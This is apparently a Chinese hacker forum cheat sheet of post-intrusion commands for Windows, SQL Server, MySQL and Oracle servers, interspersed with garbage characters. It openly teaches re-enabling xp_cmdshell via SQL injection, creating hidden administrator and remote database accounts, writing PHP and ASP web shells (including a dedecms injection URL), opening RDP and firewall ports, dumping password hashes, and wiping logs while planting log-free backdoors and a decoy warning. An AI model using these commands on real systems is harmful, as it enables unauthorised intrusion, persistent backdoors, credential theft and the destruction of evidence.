/ v; ?+ i+ A( H1.net user administrator /passwordreq:no
( Y1 {& S5 a. e$ k- m/ ^" d6 Q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 M2 Q/ Q n! j# W: F, K @* O5 i2.比较巧妙的建克隆号的步骤& F3 k) v" M8 l' n8 s
先建一个user的用户3 ]+ U K# }) o$ }! S3 k8 T% M5 Q* j
然后导出注册表。然后在计算机管理里删掉" v7 Y, Z, O7 Z# g0 _4 D. D
在导入,在添加为管理员组
! V+ k$ v, Q6 A4 t3.查radmin密码4 f1 A0 B" u) S) T# e
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg% ~9 t4 E7 i9 ?
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]. V# [+ ]/ r: L, N0 T% [
建立一个"services.exe"的项3 V& f/ \! E8 @7 M5 D1 Z
再在其下面建立(字符串值)
* y" ]2 v. F# P, K键值为mu ma的全路径
; b/ K; x, D( s* J3 x" p; Q7 M6 v5.runas /user:guest cmd8 G' a+ ~' ?$ u i, [5 @+ B
测试用户权限!% L, n2 D0 |' t; b' v
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?3 s; S9 {. u% l6 A$ l
7.入侵后漏洞修补、痕迹清理,后门置放:
. j% J* G+ c& `% M) v; K基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
" K O0 v5 u' y* X! O8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
& Q7 t T2 }1 Q0 ^8 ~
/ W5 P) N7 v* k F+ o( p5 Pfor example
' ?9 c# z$ c* T! Z$ E& t. f/ h. L; Y% k5 q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'8 B4 s T/ q" F r
5 C d8 H- i) `7 z4 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
" A; Q: x& O$ R0 y6 q8 `2 l
6 S: V# y! v. t8 v( y7 D9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
+ I% A* q' k( \如果要启用的话就必须把他加到高级用户模式
6 P. b1 P9 I* n. n可以直接在注入点那里直接注入& h: Z, g" w- m$ d
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--; R9 n* r8 e+ d! H$ ~2 W
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--2 X% o" R; @" H9 }8 N9 a' w( z+ |
或者5 u) m" C2 |9 d9 [& K
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: B, O& j7 t# U6 c+ X% i7 h6 n8 k8 w5 S来恢复cmdshell。
3 J: o' s9 d o4 e$ G- z# u" m% K, k- e! z o# m2 Q Y
分析器
5 G4 f+ S" Y$ V* b3 OEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 \- x" s1 Y+ F7 s( O3 ~" x然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")' N7 r$ L- H$ J# G" f5 p) _
10.xp_cmdshell新的恢复办法
: e% p$ m0 i7 W' {! V! }xp_cmdshell新的恢复办法1 E( s4 ?; w4 U- M( ?3 S% X
扩展储存过程被删除以后可以有很简单的办法恢复:5 O7 n) L" |7 J8 O! m- V
删除! @1 u$ I3 b. i7 U
drop procedure sp_addextendedproc
4 P" k1 |5 X8 y b% i$ E1 mdrop procedure sp_oacreate0 R3 |4 a. Z3 V
exec sp_dropextendedproc 'xp_cmdshell'
2 g$ J9 l* K: Z5 ]$ M+ z4 J& O$ o2 z
恢复
$ U( R$ p H, K' ldbcc addextendedproc ("sp_oacreate","odsole70.dll")
0 N# p- ^& B$ W" j) zdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
* m# z) n# Z8 \/ G f5 t+ ~5 n1 E; n* w$ F' y
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
: j( k5 O) ~( q4 L Y, J
' f: J4 r$ n7 F& H9 s-----------------------------! |: U# [3 X8 n% K/ `, N- Q7 H4 y
% {$ E6 L$ h6 `% P; F删除扩展存储过过程xp_cmdshell的语句:( M6 X# S: x: ?+ |- c( U6 r
exec sp_dropextendedproc 'xp_cmdshell'
+ j$ D6 S1 s! x/ g$ l/ A
7 `! Q9 \: X, o* |3 ]恢复cmdshell的sql语句5 w7 R. |, D9 [! y, U! H" Z
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
$ X3 s. ~/ O5 j2 m. L1 n( `! M L4 D. k7 M' Z' a; c
+ K9 `+ W) I( q# k5 d$ E开启cmdshell的sql语句
) a3 w0 n8 n% I- h0 |& E4 J( x7 Y! X9 d$ Y! h. G* ~8 N0 d
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 O8 P+ `5 a. `% P+ R( E
/ P+ G o% T& s. R判断存储扩展是否存在4 s0 i" N7 P5 d e) Y) a8 _
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
" {- ?, |2 ~+ h2 N( \3 W$ |返回结果为1就ok
& ?: p4 s3 u* a4 G7 s
! E; j0 b5 @9 j8 A7 s) |% ?# u" A恢复xp_cmdshell
5 `& e; S8 {9 w" W' rexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'% I# R K& q U& X
返回结果为1就ok- @0 o Q9 s3 v! t
, k& R) w% E% H0 O4 g" s否则上传xplog7.0.dll# z8 _! {3 D+ t
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
% n! A6 M' U8 r# |9 @$ A- z3 G' n7 N# {. j: q" Q3 D& }* `# {% t0 e
堵上cmdshell的sql语句
& n; }! E+ _( qsp_dropextendedproc "xp_cmdshel! a. j9 S u# r+ D* c. p. A
-------------------------
* w9 A% v$ ]3 v" M* I; s清除3389的登录记录用一条系统自带的命令:! _, P, }* Z1 f
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f8 { k- q: A- k, b
' e1 k. Q, s6 d* }: Q0 l
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
9 u9 [( }. B) k6 i# d/ B6 W4 `在 mysql里查看当前用户的权限8 \ G- {8 B5 n2 g0 q5 Z
show grants for ; p- L: ?% [" }! ^& T9 Z
* ]: v3 m" K# ~" t
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 @; u: @( |* h5 e1 x1 ^
! ~( I; ^& B& H8 I
0 g3 p5 m% {7 w, i1 S9 oCreate USER 'itpro'@'%' IDENTIFIED BY '123';( P' Q+ h# O; X. { W, }4 S$ q
5 {* ]1 @/ k) M% G: B+ @3 J
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION5 H0 D Y/ w8 }* O6 }8 ]2 ]
; t' z$ L. Y7 o. ]. N
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 07 O F+ |- N8 ^
. e) J8 p- }- M, M" cMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
x4 Q) X3 |* u, z% _6 q0 F% R5 F* y F+ F
搞完事记得删除脚印哟。
' l9 s3 Z- P5 z$ d6 f" f; I- c+ G% m" i* F( W( y8 z7 j
Drop USER 'itpro'@'%';, r+ e1 s; V/ d$ n$ w* l
# k9 P2 R) o% \) `9 V2 M" A: k
Drop DATABASE IF EXISTS `itpro` ;1 Z' c2 ], Q5 {! v5 u
/ n% @$ @' Z* O ], p
当前用户获取system权限
: h& g& H6 a( \+ r. y6 K$ }sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! N6 A; A* f. t2 X3 ?/ ^ p; ksc start SuperCMD
8 A% x3 U+ U( h! m程序代码
6 y7 N/ u7 Q2 ^0 r) f<SCRIPT LANGUAGE="VBScript">
+ O+ t: H. D* X9 A$ q$ lset wsnetwork=CreateObject("WSCRIPT.NETWORK")
- s/ i0 K$ w6 `4 y' v Bos="WinNT://"&wsnetwork.ComputerName
( z* ~. ~: v% V g5 _5 aSet ob=GetObject(os)' L3 J$ a# Y* O. s8 B$ c7 }
Set oe=GetObject(os&"/Administrators,group")
; R, u2 s; G0 V" y" G6 USet od=ob.Create("user","nosec")
8 f2 S- K, `- a1 Z( L. P8 C, aod.SetPassword "123456abc!@#"# P7 g2 S! {4 v
od.SetInfo
* ]% y% r' ?& |" V3 R) p2 DSet of=GetObject(os&"/nosec",user)
2 U# b4 u2 G5 l. q; d. woe.add os&"/nosec"
6 e4 A- s2 A- u# T* Y. z</Script>6 f1 x1 B" O9 k5 v' O$ U
<script language=javascript>window.close();</script>
& R% h# ] A/ Z7 Z$ S$ G2 j+ |& ^! o
- r e+ ^, q: @4 Q
2 M8 I8 W! ], q- {& Q; J- ]
! J0 h- b7 S& T4 ^7 L: D突破验证码限制入后台拿shell8 n' s/ {" G7 k' I5 h) h
程序代码3 d2 u- K: N7 H0 o- Z3 N B- x
REGEDIT4 0 V0 w8 b( I- h
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
9 @+ t' f2 f g' f"BlockXBM"=dword:00000000
3 N* D& H' ^8 G, \) h2 X, _% l
% x5 i5 `5 P0 [( `/ c保存为code.reg,导入注册表,重器IE
' |8 K4 [" y) T0 ^1 d& T就可以了' F* I4 P' t' M0 G+ j; x& }
union写马1 V+ f9 a3 U4 d- K9 `3 s
程序代码6 C5 t7 y7 l* H. N! T d
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
: G- g8 ` ~/ W3 k4 G6 }2 k6 E9 U, t1 X6 w
应用在dedecms注射漏洞上,无后台写马3 I, h! |& x* [3 m+ Y$ V9 r0 o4 |
dedecms后台,无文件管理器,没有outfile权限的时候: Z8 ^" ^* r; N. L5 D
在插件管理-病毒扫描里4 n5 y/ [: _6 N4 Q5 L' ^+ @
写一句话进include/config_hand.php里
! \* [. q- M1 L X/ Q- I程序代码
( F T* R* a) q>';?><?php @eval($_POST[cmd]);?>
# T" t2 p/ R: y1 f4 I
% z+ a* c- S% u" _) e
% u! h% t7 d0 y5 c; a如上格式
6 U! C4 S! \, ?, U; o. i/ P$ }
4 N2 u+ p6 a( C! Toracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解' f" E) Q1 l9 H" X6 F4 W
程序代码4 g; j/ T' v& ~9 c
select username,password from dba_users;4 R/ l# s, X+ g4 q- K
, h: B( _; N, \# {" B+ s. t( f
5 n5 W) h: F' cmysql远程连接用户+ p( B4 `4 @. ^3 S
程序代码+ I# s! T0 @( [* F4 f% s! Y. Z
1 p/ c% B3 r0 {- r/ Y: a- {4 c( u) \Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
; J( @2 C: T eGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION7 M: N/ b* `+ V9 E( w5 b/ @9 M
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 J( J; l, B7 C1 f9 {' l5 P! c( mMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
# t7 C* u" G2 i2 a2 _6 r
" n- f# i' @' V/ E! x* y2 t- a9 t
' H, K; \! U8 z% ~
% F7 }+ x0 p. e/ V7 A
1 E r$ a& T Oecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
4 k& H5 D9 l! N" S* i; R, K; r+ v6 V0 b. L
1.查询终端端口4 j6 i: Z0 z) H6 i2 @! O1 k
5 Y$ ~$ u; j2 j( I! mxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber: S$ F: s: q! ?
& S O9 Q, n! J" N" Z5 {# E2 d
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"# d7 I7 ]8 n/ `& W3 k) r
type tsp.reg: |) v/ G3 o' L, m9 v. T
c) N+ X6 ?" X/ ?( S
2.开启XP&2003终端服务
9 g8 T- \+ o* f' ~2 H( A& \4 S
, i- X+ e3 @- S& @/ k. h
4 O- e1 A4 J _& j% _: _. b9 H3 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f: q6 `: g8 [/ h) s8 n2 T8 p3 `6 }- j4 Z
5 v5 [6 \) o- P
" K& N D) e5 x. n' j8 w- FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
, ?5 ]1 z/ b& X: R# d, e# \% J6 A0 I/ L$ C, U9 U9 |
3.更改终端端口为20008(0x4E28)
- ~( V, l. x0 Y3 e6 s0 i) T; s0 Y) y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f. v4 n! b8 K0 G. X
' f9 T2 R, {3 y! k' m5 i/ C2 T* |+ l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
( m, P! J4 A; v% U1 D( @& S( K& a* a0 ^* [- w
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制' \3 \7 a- @- u9 P( ]& V+ J1 b3 \
0 g" r) A6 D' X9 U6 ^REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f5 r* I9 X1 S, G7 w+ z
8 }, D' M5 k( h* U( g7 {
% }6 H& o& d5 N. l4 i! x# E9 k( `5.开启Win2000的终端,端口为3389(需重启)+ }7 t5 z8 S0 l2 Q- \7 f" Y2 {# G
6 _& n! k" _/ P; M
echo Windows Registry Editor Version 5.00 >2000.reg " T# v6 i+ h+ [3 L
echo. >>2000.reg* N0 A7 { T$ I0 T- m) r8 `$ E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 5 C) w5 M0 f7 k9 K V
echo "Enabled"="0" >>2000.reg 7 O& w" H4 A2 n _& [; Y i- n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 5 H y, m' d1 `6 S0 o
echo "ShutdownWithoutLogon"="0" >>2000.reg
5 \, Y, C+ @0 `# v3 y- Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
9 Y# l( {( j2 D7 f# }5 v" ^' mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
$ f3 ]) `( ?- f% secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
+ s! n8 Z& v8 G( x7 }echo "TSEnabled"=dword:00000001 >>2000.reg 4 N! {( V' W) o7 G% n& ~- G9 e/ D/ Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
1 \- |& i* b1 N+ l" m- O4 ]echo "Start"=dword:00000002 >>2000.reg ) P5 V! F# i8 T7 j3 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
4 C4 _9 ~9 ]% x7 T/ l! |( Decho "Start"=dword:00000002 >>2000.reg * a* O2 k; S- ~, A! E0 B6 A5 B7 p4 w
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg O8 @, E2 j5 L$ {9 x9 u6 _! g
echo "Hotkey"="1" >>2000.reg
- U$ Y' k0 _: z, i! d4 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg O& M" P: u6 a9 x8 V& M/ [
echo "ortNumber"=dword:00000D3D >>2000.reg 5 c3 m' ~6 B( z2 ~& u0 {7 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ) r; v' K" K5 u9 k" h
echo "ortNumber"=dword:00000D3D >>2000.reg5 Q$ w4 {; W0 ~
8 V' N) [1 A2 ?7 p6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
) Z0 P) f' k7 T: I* Z g- r
H9 c/ j4 `; K- G; Q5 o) K@ECHO OFF & cd/d %temp% & echo [version] > restart.inf0 n$ D7 X, D4 s! S5 Y& z) L
(set inf=InstallHinfSection DefaultInstall)
1 o. y( Z2 Y# a: ^# Y) [echo signature=$chicago$ >> restart.inf
+ _+ c0 q7 ^, S+ Vecho [defaultinstall] >> restart.inf
+ R D" _" i7 }4 I3 Yrundll32 setupapi,%inf% 1 %temp%\restart.inf
. B1 K! y" p0 w; {3 I, `9 J' B% @3 L
; h/ K6 o! u+ l- @! \7 v: a
, y8 ^/ ~' _& ]0 Z9 @- K4 w7.禁用TCP/IP端口筛选 (需重启)
! \( g( o, F* i3 i5 e. w! f" d. r6 ~& `/ ~8 e- H9 }6 f
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f8 @7 [0 F5 @' @. k( G
5 E4 u, @; o" P, P3 R$ g# }
8.终端超出最大连接数时可用下面的命令来连接
^! o* ?4 Z# Z+ y1 p ^+ b7 W5 l5 X; I
mstsc /v:ip:3389 /console
2 m9 a: q! u I4 C. s4 b
+ D4 J0 T0 o4 J/ {9 ]; F" m9.调整NTFS分区权限; E3 I% P: {+ O+ j
8 F5 {( Y; ^, n8 _
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
) P! Y: g7 F& M- N% n' O0 X. x' u7 m2 ~, `" B+ ?
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) _9 h6 `5 t: j3 F# N
z8 o. n; t( u! z- Q: G------------------------------------------------------0 U, ~3 B) {2 N) s1 P, E
3389.vbs 7 W5 N0 p) b6 i
On Error Resume Next
& q- @7 j7 h/ V2 Hconst HKEY_LOCAL_MACHINE = &H80000002
2 y! k9 K l3 s/ K: K1 d4 GstrComputer = "."
& X! R/ u1 Q2 ]1 MSet StdOut = WScript.StdOut
0 ~$ j; u; p: F/ d: R% iSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
6 S* T7 }% V: }! N. ustrComputer & "\root\default:StdRegProv"), e A9 J a$ @' h9 f8 R# L+ X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"2 D5 ~5 ` F/ R, ]
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ G# B/ q7 T, r- E% R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* f7 k* e: f% I/ D% s, i2 D1 N' S6 |oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 J1 k. ?8 `0 G. W Z/ N6 X) XstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
' q- D# w8 m+ Q& p" J% {4 [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ Q" A2 W' l! v8 m* lstrValueName = "fDenyTSConnections"$ C- A! t% F: O
dwValue = 0
) ^8 N$ \, _1 o2 R5 U! @* d# [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 \9 t0 U3 Q9 k! a) nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" X" w& i7 d2 N3 e/ n4 N9 o
strValueName = "ortNumber". i& d4 e5 u8 l+ o) L/ J4 E. l
dwValue = 3389; q5 U8 ~8 q( P1 ^; p, ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. p2 M. l/ F' lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"+ H9 {+ U. ` w0 x6 E$ I# b" u7 Z+ [
strValueName = "ortNumber"
; {3 r J: [. X( O' EdwValue = 33895 E. ?( M* r9 Y9 W
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 B$ l8 P8 W c; h v' w" t
Set R = CreateObject("WScript.Shell") 4 L% g, O7 Z2 h$ @
R.run("Shutdown.exe -f -r -t 0")
- }# I% p1 u5 Q5 r E: D. j. z
; a# K# U! j4 h删除awgina.dll的注册表键值
4 a7 P/ W! k& i0 z8 o8 i程序代码
6 d( s( _; s1 f- w" R4 U, @/ I& e5 l& H; r! O/ D# l
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f- @) E% m5 d$ T u" i9 r+ ~
/ ?0 M9 F% U T) L
8 O, v8 M; ?4 [" ^+ \0 T/ ~7 e- W0 ]
( L" D8 q5 t7 i5 M/ }1 J程序代码) I6 ` A% D+ [2 Q" G- E% O4 d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash8 u' a o+ K% R8 W7 @
8 `! g- S- O3 ^9 [1 @8 u- h" L设置为1,关闭LM Hash
( q' n+ u V6 s& u B+ v9 m; B0 j1 _
数据库安全:入侵Oracle数据库常用操作命令
+ [3 [% c/ i- T. j6 i+ }最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。: ~& _' ^8 M8 m
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
9 q# j% G+ Z9 R' f% p2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;- H9 Z9 E7 m, e0 G/ L9 F. M
3、SQL>connect / as sysdba ;(as sysoper)或
@5 ]2 ]0 N1 R$ `. L% f4 a7 l# vconnect internal/oracle AS SYSDBA ;(scott/tiger). ?( S- T1 U. u( u! P, l. M
conn sys/change_on_install as sysdba;
. w# U/ Q, l, C" U) ^5 [4、SQL>startup; 启动数据库实例
6 j7 Y. m4 u4 R1 I7 ]) i5、查看当前的所有数据库: select * from v$database;+ b' Y# n0 T. h- w
select name from v$database;
& g( x- }8 ~* s9 a6、desc v$databases; 查看数据库结构字段! x. ^* F' U; a- i& ^
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
7 x! {0 y, I: X3 L4 SSQL>select * from V_$PWFILE_USERS;0 l5 p6 C( D6 V* v( O4 }4 c
Show user;查看当前数据库连接用户
" S$ u. y- F* z" F; x8 B) c8、进入test数据库:database test;
. Q! n$ s, l. f) F$ _5 r9、查看所有的数据库实例:select * from v$instance;" M- g$ N. w! H: U0 R# r% L" H
如:ora9i) H/ |# x7 G( M0 h0 V
10、查看当前库的所有数据表:8 f/ B# M4 V. [3 Q& @2 ]
SQL> select TABLE_NAME from all_tables;3 @5 ^$ l9 {4 S
select * from all_tables;
: H# y! p+ I' V4 X! T* L+ lSQL> select table_name from all_tables where table_name like '%u%';
' @9 k9 v; ]+ y* a, i7 vTABLE_NAME
) c1 c( `: b( G9 a------------------------------
" K+ d4 P5 d1 E1 M3 Q; _% y; [_default_auditing_options_
. Y% C8 u, S+ C# [ d/ S11、查看表结构:desc all_tables;! B& K* g% v# S* m
12、显示CQI.T_BBS_XUSER的所有字段结构:
6 L: i# v Z* ^. K {8 |5 edesc CQI.T_BBS_XUSER;
1 {7 s$ M& F% d' F13、获得CQI.T_BBS_XUSER表中的记录:
! i- o: w! V$ M q0 ^6 V* Kselect * from CQI.T_BBS_XUSER;! a1 ] n; G/ Y# i; [* ^+ q
14、增加数据库用户:(test11/test)
) y, {3 {- H; k5 i* Xcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
3 f: `+ [ v- {0 P' Q3 r6 a8 `6 v15、用户授权:
$ J4 Q6 h8 a4 D. ]grant connect,resource,dba to test11;) p& V8 D+ U; B! `# L
grant sysdba to test11;
: v4 l- x1 K* \* w I: p, ncommit;* x$ o8 l3 C, x. q
16、更改数据库用户的密码:(将sys与system的密码改为test.)1 ?! n- H/ m- e
alter user sys indentified by test;
/ n, F0 y4 u$ r# Q; p6 e; Q$ }alter user system indentified by test;
7 z- C$ i7 N% I3 I/ v9 }/ D4 M5 `$ z# x% n) z1 U: b
applicationContext-util.xml; o1 `& ~, C; ~% H* R
applicationContext.xml
- f) i( E) e' M' l- Nstruts-config.xml; H! a; L2 u4 E8 N6 L/ F
web.xml
# h- v$ T, ^) r q/ Jserver.xml
9 i/ }1 p( S6 }0 htomcat-users.xml5 p3 j$ {/ v! @8 Q
hibernate.cfg.xml
$ [! P+ o+ r1 Wdatabase_pool_config.xml2 v0 }2 |7 y* p
+ l9 _7 }) H' Z( o; \$ d
! o& }$ M4 n2 H# }1 M. c\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置5 ~* h1 b* E3 R7 T8 N
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini: ]. q- R$ ~7 ^' v
\WEB-INF\struts-config.xml 文件目录结构
; n7 V6 ]( o& b6 w; v" q
( _2 j/ K9 \; R- F$ L! t8 F' g8 A' Cspring.properties 里边包含hibernate.cfg.xml的名称$ E, i6 ]* R2 \2 x* L. m* Y
" {8 Y. A9 g$ T! E$ P0 q
: g' m) r# E8 P S4 x- i" S% n0 w
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
. c: z: V& Z# w5 [( |/ D2 c# s
. d% u$ Y$ n g4 Q如果都找不到 那就看看class文件吧。。
, E: @ t7 D+ M1 o& x. o7 ~9 P3 V
测试1:
$ {% n( {3 x" iSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
3 B! F }& T6 A6 K+ z/ R( c" B$ I6 ~, H7 b4 d
测试2:
% f$ K8 \, e; n" P9 {+ e9 y8 r
0 c; S! s/ B; Q6 u n& E' g ncreate table dirs(paths varchar(100),paths1 varchar(100), id int)
7 S1 f: X* m; G1 i' e
' n& M9 L1 K& b5 J& wdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--7 g" e! K! q( _: S0 V3 H. I
: o, ^0 I d5 u" hSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t12 N5 w9 Q0 k. k' |
4 N: S* T% H( d _+ x/ K" n查看虚拟机中的共享文件:, U9 W; Q. E7 ?" D6 W0 m
在虚拟机中的cmd中执行
; o K1 ?7 A- r- e1 `\\.host\Shared Folders$ r# _$ F8 z+ |# o
4 e3 j/ J/ Z m1 k5 b/ m
cmdshell下找终端的技巧& N: M6 K6 a* [
找终端: % r1 L. H) | {: E
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
6 J, t f+ c; n 而终端所对应的服务名为:TermService
0 e9 C! B/ N* O第二步:用netstat -ano命令,列出所有端口对应的PID值!
, h' _6 l" [3 z) U 找到PID值所对应的端口( r& d) p7 f+ h0 z$ Q& g
9 w' K& B; {# H* O: w查询sql server 2005中的密码hash% E$ [& f+ `, z4 Z& g8 M" M' f
SELECT password_hash FROM sys.sql_logins where name='sa'8 G8 I1 F3 E. F8 U
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a) v( \! R2 T$ X/ \$ z
access中导出shell1 v7 M1 I, c; n7 B1 } E- W# E6 c
% p5 g0 {3 ~- Q$ L: H/ d0 Y中文版本操作系统中针对mysql添加用户完整代码:
( O. }$ W* ?* ?9 r0 H+ C$ v/ J# l' q! [& c. X
use test;. u2 ~" S2 M2 d
